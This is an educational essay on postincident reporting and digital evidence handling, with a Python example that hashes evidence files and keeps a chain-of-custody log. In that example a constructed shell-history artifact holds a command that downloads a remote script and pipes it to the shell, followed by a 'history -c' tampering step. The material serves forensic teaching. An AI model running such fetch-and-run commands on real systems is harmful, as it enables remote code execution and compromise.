Identity Theft Response

bwilson
Informationsecuritycontinuousmonitoring.docx

Information security continuous monitoring (ISCM) is defined as "maintaining ongoing awareness of information security, vulnerabilities, and threats to support organizational risk management decisions" (Dempsey et al., 2011).

Incidents, often discovered through an ISCM program, are the result of controls that failed or were bypassed, and they occur even when the organization is implementing adequate risk mitigation, for instance through the risk management framework (RMF) outlined by the National Institute of Standards and Technology (NIST, 2010).

Incident response controls outlined in NIST Special Publication 800-53 are aimed at recognizing and handling incidents and at mitigating and remediating the damage that can result from them (NIST, 2013). An incident is an event that violates, or imminently threatens to violate, the organization's security policies. Once an incident has occurred, the organization must assess the damage to its critical systems and data before deciding how to respond.

An important part of any postincident process is to document the nature and cause(s) of the incident as accurately as possible, since the record may have to be presented in court. A postincident report should follow a few simple steps, as outlined by Kim and Solomon (2018):

· Preparation of the incident report: Decide how to respond to the threat or incident and form an incident report team.

· Identification: Did the incident really happen? If it did, is it damaging to the organization? This is not a rhetorical question: an event may not be serious enough to justify the resources and staff needed to address it.

· Notification: This is an important step in the postincident report. If an incident has taken place, the appropriate authorities must be notified immediately. Sometimes senior managers find a problem but do not communicate it to key stakeholders for fear of losing their jobs, or of the company losing its reputation and its clients' trust.

· Response: In this step, senior managers decide on the best way to address the incident while minimizing downtime.

· Recovery: Once the appropriate measures have been taken to address the incident, senior managers must reexamine the organization's systems to confirm that the threat or vulnerability has been eliminated.

· Follow-up: Now that the system is up and running, senior managers and leadership must ask: What have we learned from this incident? What policies or procedures need to be updated? What can we do to prevent another occurrence?

· Documentation and reporting: Document the incident and its cause(s) and use it as a teaching moment.

Any postincident handling must follow the rules of evidence under applicable laws and regulations. This ensures the admissibility, authenticity, completeness, reliability, and believability of the postincident evidence should it need to be presented in court. While cybersecurity law is still relatively new, there are established requirements for evidence to be introduced in court (Braid, 2002):

· Admissible evidence can be used in court; evidence collected in a way that violates law or procedure may be excluded.

· Authentic evidence can be positively tied to the incident under investigation.

· Complete evidence tells the whole story, including material that supports alternative interpretations, rather than just one perspective.

· Reliable evidence has been collected and handled in a way that leaves no doubt about its authenticity and accuracy.

· Believable evidence is clear and easy for a jury to understand.
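In practice, the authenticity and reliability requirements above come down to being able to prove that a collected artifact has not changed since it was collected, and who has had custody of it in the meantime. The following is an added example (not from the page or from Braid's paper) of one common way to do that: hash every collected file, record the hashes together with an append-only custody log, seal the manifest itself with a hash, and re-verify the files later. The file names, log contents, case identifier, and custodian names are all constructed for the example.

```python
"""Evidence manifest with integrity hashes and a chain-of-custody log.

Added example; every file, log line, case id and custodian below is constructed.
"""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone


def utc_now():
    # ISO-8601 UTC timestamps: an evidence timeline must not depend on local clocks.
    return datetime.now(timezone.utc).isoformat()


def sha256_file(path, chunk_size=65536):
    """Hash a file in chunks so large disk images need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def build_manifest(paths, case_id, collector):
    """Record what was collected, by whom, when, and a hash of each item."""
    items = [
        {"path": p, "size": os.path.getsize(p), "sha256": sha256_file(p)}
        for p in paths
    ]
    return {
        "case_id": case_id,
        "items": items,
        # Every hand-off is appended here; existing entries are never rewritten.
        "custody": [{"event": "collected", "by": collector, "at": utc_now()}],
    }


def record_transfer(manifest, from_person, to_person, reason):
    """Append a custody event; returns the manifest so calls can be chained."""
    manifest["custody"].append(
        {"event": "transfer", "from": from_person, "to": to_person,
         "reason": reason, "at": utc_now()}
    )
    return manifest


def seal_manifest(manifest):
    """Hash the manifest itself (canonical JSON) so the record of hashes
    can also be checked, e.g. after it has been stored with the case file."""
    canonical = json.dumps(manifest, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def verify_manifest(manifest):
    """Return {path: True/False}; a missing file counts as a failure."""
    results = {}
    for item in manifest["items"]:
        path = item["path"]
        if not os.path.isfile(path):
            results[path] = False
            continue
        results[path] = (os.path.getsize(path) == item["size"]
                         and sha256_file(path) == item["sha256"])
    return results


def demo():
    """Constructed scenario: two evidence files, one of them altered later.
    Returns (results before tampering, results after tampering, manifest)."""
    workdir = tempfile.mkdtemp(prefix="evidence-")
    auth_log = os.path.join(workdir, "auth.log")
    shell_hist = os.path.join(workdir, "bash_history")
    with open(auth_log, "w") as fh:  # constructed sample log line
        fh.write("Mar 03 02:14:07 web01 sshd[4412]: Accepted password for backup "
                 "from 203.0.113.7 port 51234 ssh2\n")
    with open(shell_hist, "w") as fh:  # constructed sample history line
        fh.write("curl -s http://198.51.100.9/x.sh | sh\n")

    manifest = build_manifest([auth_log, shell_hist], "IR-2024-0007", "analyst_a")
    record_transfer(manifest, "analyst_a", "forensics_lead", "imaging complete")
    seal_before = seal_manifest(manifest)

    before = verify_manifest(manifest)
    # Simulate someone "cleaning up" the history file after collection.
    with open(shell_hist, "a") as fh:
        fh.write("history -c\n")
    after = verify_manifest(manifest)

    # The manifest was not touched, so its seal is unchanged.
    assert seal_manifest(manifest) == seal_before
    return before, after, manifest


if __name__ == "__main__":
    before, after, manifest = demo()
    print("before tampering:", before)
    print("after tampering: ", after)
    print("custody events:  ", len(manifest["custody"]))
```

The seal over the manifest is what you would store separately (or sign) so that a later challenge to the hashes themselves can be answered; the custody log is only appended to, never edited, so every hand-off between the first responder and the forensics examiner remains visible.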

In addition to following the rules of evidence, senior managers and leadership must remember that in most instances a professional cyberforensic expert will be called in to help with the postincident report. If a cybercrime forensics expert is called in, it is important that he or she has the appropriate credentials and certifications.

A cyberforensics expert must also remember that crime does not happen in isolation: criminals need the means to commit a crime and the opportunity to commit it, and they usually have a motive. Cybersecurity professionals refer to motive, opportunity, and means by the acronym MOM.

Another important concept in the postincident report is that whenever a crime is committed, the criminal not only takes something away but also leaves something behind. This is known as Locard's exchange principle; in a digital investigation, what is left behind includes log entries, file-system artifacts, and network records.

References

Braid, M. (2002). Collecting electronic evidence after a system compromise. https://www.giac.org/paper/gsec/659/collecting-electronic-evidence-system-compromise/101519

Dempsey, K., Chawla, N. S., Johnson, A., Johnston, R., Jones, A. C., Orebaugh, A., Scholl, M., & Stine, K. (2011, September). Special publication 800-137: Information security continuous monitoring (ISCM) for federal information systems and organizations. National Institute of Standards and Technology (NIST). http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-137.pdf

Kim, D., & Solomon, M. (2018). Fundamentals of information systems security (3rd ed.). Jones & Bartlett Learning.

National Institute of Standards and Technology (NIST). (2010, February). Special publication 800-37, Revision 1: Guide for applying the risk management framework to federal information systems. http://dx.doi.org/10.6028/NIST.SP.800-37r1

National Institute of Standards and Technology (NIST). (2013, April). Special publication 800-53, Revision 4: Security and privacy controls for federal information systems and organizations. http://dx.doi.org/10.6028/NIST.SP.800-53r4